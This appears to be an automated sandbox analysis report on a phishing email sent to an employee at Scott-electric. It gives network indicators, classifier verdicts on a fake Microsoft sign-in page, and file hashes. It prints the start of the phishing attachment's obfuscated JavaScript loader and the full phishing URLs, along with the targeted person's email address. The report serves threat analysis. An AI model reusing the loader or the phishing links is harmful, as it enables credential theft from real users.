https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.com | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
51.38.145.13 | f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz | France | 16276 | OVHFR | true
52.113.194.132 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
142.250.185.67 | unknown | United States | 15169 | GOOGLEUS | false
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
52.111.236.32 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
173.194.76.84 | unknown | United States | 15169 | GOOGLEUS | false
142.250.185.110 | unknown | United States | 15169 | GOOGLEUS | false
142.250.185.238 | unknown | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
142.250.185.163 | unknown | United States | 15169 | GOOGLEUS | false
2.19.126.160 | unknown | European Union | 16625 | AKAMAI-ASUS | false
184.28.90.27 | unknown | United States | 16625 | AKAMAI-ASUS | false
142.250.184.228 | www.google.com | United States | 15169 | GOOGLEUS | false
13.69.116.108 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.109.76.243 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.109.76.144 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                                          IP
                                          192.168.2.17
                                          192.168.2.7
                                          192.168.2.18
                                          Joe Sandbox version: 40.0.0 Tourmaline
                                          Analysis ID: 1466358
                                          Start date and time: 2024-07-02 20:21:14 +02:00
                                          Joe Sandbox product: CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled: false
                                          Report type: full
                                          Cookbook file name: defaultwindowsinteractivecookbook.jbs
                                          Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed: 24
                                          Number of new started drivers analysed: 0
                                          Number of existing processes analysed: 0
                                          Number of existing drivers analysed: 0
                                          Number of injected processes analysed: 0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode: stream
                                          Analysis stop reason: Timeout
                                          Sample name: 44zg1cvu.msg
                                          renamed because original name is a hash value
                                          Original Sample Name: FW BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for Scott-electric Friday 28th of June 2024 m144zg1cvu.msg
                                          Detection: MAL
                                          Classification: mal68.phis.troj.winMSG@20/67@28/148
                                          Cookbook Comments:
                                          • Found application associated with file extension: .msg
                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                          • Excluded IPs from analysis (whitelisted): 52.113.194.132, 184.28.90.27, 52.109.76.243, 2.19.126.160, 2.19.126.151, 93.184.221.240, 52.111.236.32, 52.111.236.33, 52.111.236.35, 52.111.236.34, 192.229.221.95, 52.109.76.144, 13.69.116.108, 142.250.185.163, 142.250.185.110, 173.194.76.84, 34.104.35.123
                                          • Excluded domains from analysis (whitelisted): omex.cdn.office.net, neu-azsc-000.odc.officeapps.live.com, odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, onedscolprdweu15.westeurope.cloudapp.azure.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, a1864.dscd.akamai.net, osiprod-neu-bronze-azsc-000.northeurope.cloudapp.azure.com, ecs.office.com, fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, nleditor.osi.office.net, prod-eu-resolve
                                          • Not all processes were analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetValueKey calls found.
                                          • VT rate limit hit for: 44zg1cvu.msg
                                          Input / Output
                                          URL: e-Mail Model: gpt-4o
```json
{
  "riskscore": 7,
  "brand_impersonated": "Scott-electric",
  "reasons": "1. The email claims to be from Scott-electric, a known brand, which could be an impersonation attempt.\n2. The email header shows two different email addresses: noreply@netchexonline.com and melodi@scott-electric.com, which is suspicious and indicative of potential spoofing.\n3. The subject line and body create a sense of urgency by emphasizing the enrollment deadline and the need to take immediate action.\n4. The email contains an attachment, which is a common tactic used in phishing emails to deliver malicious content.\n5. The warning at the top of the email indicates that it was sent from outside the organization, which is a red flag for phishing attempts.\n6. The email uses social engineering tactics by emphasizing the importance of the enrollment process and the potential consequences of not acting."
}
```
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true Model: Perplexity: mixtral-8x7b-instruct
                                          {"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form, as it does not request any sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text does not create a sense of urgency, as it does not prompt the user to take immediate action or imply any negative consequences for not doing so.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism."]}
                                          Title: LLZ-950309.htm OCR: It looks like this email is used with more than one account from Microsoft. Which one do you want to use? Work or school account Created by yur department melodi@scott-electric.com Personal account Created by yu meldi@scott-electric.com Tired of seeing this? Rename your #rsonal Microsoft account. Sign in with another account Terms of use Privacy & ckies 
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true Model: Perplexity: mixtral-8x7b-instruct
                                          {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","The text does not create a sense of urgency or interest.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                          Title: LLZ-950309.htm OCR: a Microsoft melodi@scott-electric.com Enter password Password Forgot my password Sign in Terms of use Privacy & ckies 
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz Model: gpt-4o
```json
{
  "phishing_score": 9,
  "brands": "Microsoft",
  "phishing": true,
  "suspicious_domain": true,
  "has_prominent_loginform": true,
  "has_captcha": false,
  "setechniques": true,
  "has_suspicious_link": false,
  "legitmate_domain": "microsoft.com",
  "reasons": "The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious. The domain name is not associated with Microsoft, which is the brand identified in the image. The legitimate domain for Microsoft is 'microsoft.com'. The presence of a prominent login form asking for a password without a CAPTCHA and the use of a misleading domain name are strong indicators of phishing. Social engineering techniques are evident as the page mimics the legitimate Microsoft login page to deceive users into entering their credentials."
}
```
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/login Model: Perplexity: mixtral-8x7b-instruct
                                          {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as passwords and email addresses.","There is no sense of urgency created in the text.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                          Title: LLZ-950309.htm OCR: Microsoft melodi@scott-electric.com Enter password Your account or password is incorrect. If you don't remember your password, reset it now. assword Forgot my password Sign in with another account Sign in Terms of use Privacy & ckies 
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz Model: gpt-4o
```json
{
  "phishing_score": 9,
  "brands": "Microsoft",
  "phishing": true,
  "suspicious_domain": true,
  "has_prominent_loginform": true,
  "has_captcha": false,
  "setechniques": true,
  "has_suspicious_link": true,
  "legitmate_domain": "microsoft.com",
  "reasons": "The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious due to its random string subdomain and the '.xyz' top-level domain, which is often used in phishing attacks. The webpage mimics Microsoft's login page, which is a common target for phishing. The presence of a prominent login form asking for a password without a captcha further raises suspicion. The legitimate domain for Microsoft is 'microsoft.com', and this URL does not match it. Additionally, the link for 'Forgot my password' and 'Sign in with another account' could be used to mislead users into providing their credentials."
}
```
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/login Model: Perplexity: mixtral-8x7b-instruct
                                          {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","There is no sense of urgency created in the text.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                          Title: LLZ-950309.htm OCR: Microsoft melodi@scott-electric.com Enter password Your account or password is incorrect. If you don't remember your password, reset it now. Password Forgot my password Sign in with another account Sign in Terms of use Privacy & ckies 
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz Model: gpt-4o
                                          {  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": false,  "legitmate_domain": "microsoft.com",  "reasons": "The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious due to its random string and unusual domain extension (.xyz), which is often used in phishing attacks. The page mimics a Microsoft login page, which is a common target for phishing. The presence of a prominent login form asking for a password without a CAPTCHA increases the risk. The legitimate domain for Microsoft is 'microsoft.com', and this URL does not match it. The use of social engineering techniques is evident as the page attempts to trick the user into entering their password by displaying a message about an incorrect password. Based on these factors, the site is determined to be a phishing site."}
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):231348
                                          Entropy (8bit):4.389917379080562
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3F983F99D5949991ADC0526B13167508
                                          SHA1:BA696450EF51F803896C5C457B019488E7879300
                                          SHA-256:6CBE12B3F9213AF97C6E0BD1FF135500A7CF035735798BA348F856C5E045CA36
                                          SHA-512:65C29289B3E4A60AB2D7E3B6713B9910280956B1C0894891C8BB9BDD21BB806DA1B0AD4FCBEB28CE658C81E64EE0B3188904419627E540B4765F89ABD2323F39
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:XML 1.0 document, ASCII text, with very long lines (2139), with no line terminators
                                          Category:dropped
                                          Size (bytes):2139
                                          Entropy (8bit):5.072738961105246
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4EE0F8584BFA8C4F99FB6D3447B82F6E
                                          SHA1:552433B080E6E29BB905ADB98799F6DB8CCC1530
                                          SHA-256:FB216474F51BB39257419B6ABAAB936B11A3B9F8471AF555F8EF641A8D170F58
                                          SHA-512:746195D9684C0351C739B39AF482110AE5CB64B1EF611EE94FB70A0A211E9570677ECE838BAF866D96B04146FAE1A5A801FBA688C364B7E137DF9AF5CFDF1814
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>14</Count><Resource><Id>Aptos_26215680</Id><LAT>2024-07-02T18:21:48Z</LAT><key>29939506207.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos_45876480</Id><LAT>2023-10-06T09:55:52Z</LAT><key>27160079615.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2023-10-06T09:55:52Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_26215426</Id><LAT>2023-10-06T09:55:52Z</LAT><key>37262344671.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215682</Id><LAT>2023-10-06T09:55:52Z</LAT><key>28367963232.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-06T09:55:52Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos_
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:TrueType Font data, 16 tables, 1st "GPOS", 30 names, Macintosh, Copyright (c) 2011-2015 by tyPoland Lukasz Dziedzic (http://www.typoland.com/) with Reserved Fon
                                          Category:dropped
                                          Size (bytes):656568
                                          Entropy (8bit):6.571486522102043
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8D72101CAD1547BED5BA3105041EEEAE
                                          SHA1:29EB192629B0BBB41A7B7F49AB2AEC82D4261921
                                          SHA-256:D636E4683231F931EDA222D588E944D082BFD3BDBA02F928BEE461C0F185B251
                                          SHA-512:BE6667E1F6A50E23ADA324B52FB614CA82848600A82F6EDC4EC881A3C5F5D9F0477580AF2421F42B94E1B529E07DDDA7D2D9231B128D93056B4A327D63FE7222
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:TrueType Font data, 16 tables, 1st "GPOS", 30 names, Macintosh, Copyright (c) 2011-2015 by tyPoland Lukasz Dziedzic (http://www.typoland.com/) with Reserved Fon
                                          Category:dropped
                                          Size (bytes):656544
                                          Entropy (8bit):6.544527043014445
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:79203A1947440EDE448A384841980E3C
                                          SHA1:A3A53A436BAAF6DC2E7A05F05866A761C214692B
                                          SHA-256:8A0AACE75D33794EECE4B28187BFC1DF0BBD2888B5D8A56E01788C8D65D16BE1
                                          SHA-512:097CD16A3A037B4257FC02B4C5EFE1ACA0B316AB96BB73FFB59ABA243B32A45E0CFD1D760C7C4C238C4CF949E22BCE22A67C757556314F1147DB76798022919B
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                          Category:dropped
                                          Size (bytes):322260
                                          Entropy (8bit):4.000299760592446
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CC90D669144261B198DEAD45AA266572
                                          SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                                          SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                                          SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):10
                                          Entropy (8bit):2.1219280948873624
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3D625911F9BB007CE8FC2FCB7F2651B6
                                          SHA1:63C70CBB788FEE445E2BA30CDBD2B8918048C7A3
                                          SHA-256:3632E4110B7BB7B31351F0B08A4137AC72B223B5972840125B2A90393DB09AAF
                                          SHA-512:2B40B2BDA56E3BCDC0F03926BBB9303B6669AE77A969B846EEA5994A911CF85A4F0A2D74B8CDC5C5DFE58B596D4DF4B992C210FEA34E744DBA8B157FC368B3D6
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:1719944511
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:SQLite 3.x database, last written using SQLite version 3034001, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):4096
                                          Entropy (8bit):0.09304735440217722
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D0DE7DB24F7B0C0FE636B34E253F1562
                                          SHA1:6EF2957FDEDDC3EB84974F136C22E39553287B80
                                          SHA-256:B6DC74E4A39FFA38ED8C93D58AADEB7E7A0674DAC1152AF413E9DA7313ADE6ED
                                          SHA-512:42D00510CD9771CE63D44991EA10C10C8FBCF69DF08819D60B7F8E7B0F9B1D385AE26912C847A024D1D127EC098904784147218869AE8D2050BCE9B306DB2DDE
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:SQLite Rollback Journal
                                          Category:dropped
                                          Size (bytes):4616
                                          Entropy (8bit):0.1384465837476566
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B8B829320A9B7D5104D4A398E5B30AC4
                                          SHA1:4AA563FC1CECE51746EA4C80C6332F10346F9DEA
                                          SHA-256:31E66AF9176E4F38EFDBF84A196B291BD67119FF8475F173F473E7B411DE0231
                                          SHA-512:625E4271BA5E0B4BEF3F45B0E2CFAECBA609D6E5E3108376E243660A0538E23C13048B021440733C2D52A8040C43441E83A927B1E544110B7809BB59A583866A
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):0.04469833793377624
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FC304C583D574FECB570374149272C7F
                                          SHA1:860E22D3B762B9767C90D7A5137576C8E0F88EBD
                                          SHA-256:C87968498EDB6C6DA0FE48581E253F56AF1BC877C349B26000CAB29B7E9D4809
                                          SHA-512:6AEA87DC0FCAF8732D8868B94C8258C4F48F455BE2371AA0B311CFDE40B0B900E2813D938564ABC5C1E4BF34F90B55F04B45DE835C647005B9C0CE12F61A5CEB
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:SQLite Write-Ahead Log, version 3007000
                                          Category:dropped
                                          Size (bytes):45352
                                          Entropy (8bit):0.3937546313501698
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2D0D7A8F6EB0D10BE46316A0B452D8E2
                                          SHA1:2CB66DB9242236A98787EBF67C0ECC56B03C6DFD
                                          SHA-256:E53F1B002AE6C942DE159FDC6D9BBFD18EF5D33ADB67A677884DB92B1E719887
                                          SHA-512:CCE556B535F85048EB0342595A28930DB5C2F1C7DF876A00ACCC03ED29A1F842C9B8355E88996DE787759078B6FEE47C9ACDA7C48D5E8EF863921A0C984E525B
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:HTML document, ASCII text, with very long lines (65083), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):88994
                                          Entropy (8bit):5.782582664631249
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5DAE61E2411EF0F048CDFA388ED51162
                                          SHA1:0CA5AD4647B6AB36F061C5702CEF015BFDA6A3F6
                                          SHA-256:6BEC5FB6D1E7786694E3FB88BE9F34626A543FE5979575CA16B6EE870D74C0E3
                                          SHA-512:06CF68DC4FFD714B6C85548F97D8365960BB0EE00FA6ABD7FE85B0D8019CDBBCECC3DCA37CF0BEA7DD0E8475B85D459B982DD4BC9C1090215E35AC8279AA49F5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"/>.. <meta name="robots" content="noindex, nofollow"/>.. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>.. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">..</head>..<body id="ajfpfv" data-nobymx="melodi@scott-electric.com">..<script type="text/javascript">..function a0S(U,E){var w=a0X();return a0S=function(H,X){H=H-0x10c;var S=w[H];return S;},a0S(U,E);}(function(U,E){var w3=a0S,w=U();while(!![]){try{var H=-parseInt(w3(0x2b3))/0x1*(parseInt(w3(0x2c9))/0x2)+-parseInt(w3(0x1f7))/0x3*(parseInt(w3(0x278))/0x4)+-parseInt(w3(0x13b))/0x5*(parseInt(w3(0x264))/0x6)+-parseInt(w3(0x2a3))/0x7+parseInt(w3(0x262))/0x8*(-parseInt(w3(0x11f))/0x9)+-parseInt(w3(0x139))/0xa*(parseInt(w3(0x27e))/0xb)+parseInt(w3(0x2bb))/0xc*(parseInt(w3(0x208))/0xd);if(H===E)break;else w['push'](w['shift']());}catch(X){w['push'](w[
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                          SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                          SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                          SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:[ZoneTransfer]..ZoneId=3..
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2532
                                          Entropy (8bit):3.101258377291916
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:411FDB0C8899B250371585096C724B4C
                                          SHA1:CFDECC839A394C567223733B678810C16FA0A837
                                          SHA-256:D4C74E28A9DFF56DD964B9FDBE253757709CD86C2C75225B15F0901E75E6F7E7
                                          SHA-512:0A4254016B8ABB7047370D55A055365A3340577530CE35F028F29F011CB64EC3983DE24A973F7ED0D7AF424861376B75CAC3A029E3A58FB259283DD84143B1CA
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:This is not an email that we generated, however, we use employee navigator. I’m afraid someone has hacked into our benefits portal or something. Please look into this asap. From: Melodi Bunn <melodi@scott-electric.com> Sent:
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2048
                                          Entropy (8bit):2.4140209263986785
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:068F9109BB3B3D2786732A456EFD876E
                                          SHA1:F345FC960C4FC25F6B1ACF4F5A065471D76EF5B4
                                          SHA-256:5B5CE5A29326FC57B0497811AA3536E6CD3D125CFB854BC34080E605B5388673
                                          SHA-512:A41BC27C921AADE8A7296D736E481AD5794D90D72276E7C6B26E86081AA49B3550147AD956D193CE106F548D74123EF55813A52E2DE4E7E18A40875EE509DF22
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:ASCII text, with very long lines (28753), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):20971520
                                          Entropy (8bit):0.18152278034802263
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:634C546624728FBE8035E9B58BADBF94
                                          SHA1:643DC7E5C10DD0701A5A704E945968CA9E6DD6DB
                                          SHA-256:0B2029FDCC000370A6B7E6DD197B1291DEBBD1B1D1264146ABA53D4F94B6E74A
                                          SHA-512:791B83C02F5A6BAF6667B9E370B3F1F9F3A16F3A2D38F8FF1D44C5FE402A14E3BCEEC78194E7C2F6A40D97373A73419A67826C27341DCE3B990220BE4A929917
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..07/02/2024 18:21:47.377.OUTLOOK (0xF7C).0x25C.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":25,"Time":"2024-07-02T18:21:47.377Z","Contract":"Office.System.Activity","Activity.CV":"VxuVSl3xSUCQrVlbnJS3qA.4.11","Activity.Duration":12,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...07/02/2024 18:21:47.393.OUTLOOK (0xF7C).0x25C.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":27,"Time":"2024-07-02T18:21:47.393Z","Contract":"Office.System.Activity","Activity.CV":"VxuVSl3xSUCQrVlbnJS3qA.4.12","Activity.Duration":10678,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVers
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):20971520
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:modified
                                          Size (bytes):86016
                                          Entropy (8bit):4.44421900025718
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FA83C9ABECC2E0F2C9A4D454E434801A
                                          SHA1:70E1C0C461FD7E6ED055D68AFB8AB216D8A7C3A3
                                          SHA-256:7324558D3443F1AB5F3D3F168421278FB927F032128B46CB7098026131E44C5A
                                          SHA-512:10C453A93E3ACDA591CDE5A9E1C424C70953F32BE8304602BE5F2B3C22675F0577A25CFB83002F6C23C0A238896DEB12740212CDC8B06F162CEEEE49BED10418
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:............................................................................b...\...|....e......................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................K..Y...........e..............v.2._.O.U.T.L.O.O.K.:.f.7.c.:.e.3.1.9.5.1.5.7.e.d.0.f.4.1.e.9.a.0.6.b.1.f.d.1.0.4.7.6.8.d.e.2...C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.0.7.0.2.T.1.4.2.1.4.7.0.1.2.2.-.3.9.6.4...e.t.l.............P.P.\...|...........................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):163840
                                          Entropy (8bit):0.4913993358695871
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0A6E0CFD10E2BB509E76146B706A409F
                                          SHA1:1EB98D1FBE93FC44670B87975D91C7E61CA51557
                                          SHA-256:4ACF525AB359441B2BBB5CBBDD431F0BFBBF68EFC69906413ADD27EFEDAE1A67
                                          SHA-512:BDCD8FEAFAE4EDA8BA6ED73DC7043240FDE1CF3ADC1F29BCAD349677A2DF30D6171E2FC64CDDE128E2479CA3DE8C7A6F640657DF45420A4788396278380E7FEF
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:modified
                                          Size (bytes):30
                                          Entropy (8bit):1.2389205950315936
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:26C02BF8E3F9B65C201E164F96CBD48D
                                          SHA1:9A770E3473323F2C1C9F8A25F030BBCAA462DFA2
                                          SHA-256:7E12FEFD7E3232DD74B3B51FD37AF4E4A0983E62BDA07B17CB07403BD3DD23A5
                                          SHA-512:E57001D0F1C250DD45E63B7798A3E9D3D068762DE6373B895C9C1F30B1CD97ED852A57FB624C7C5E19BA4A39CCF9C4409137FF3870D3DB6675CF6E12091FF9E8
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
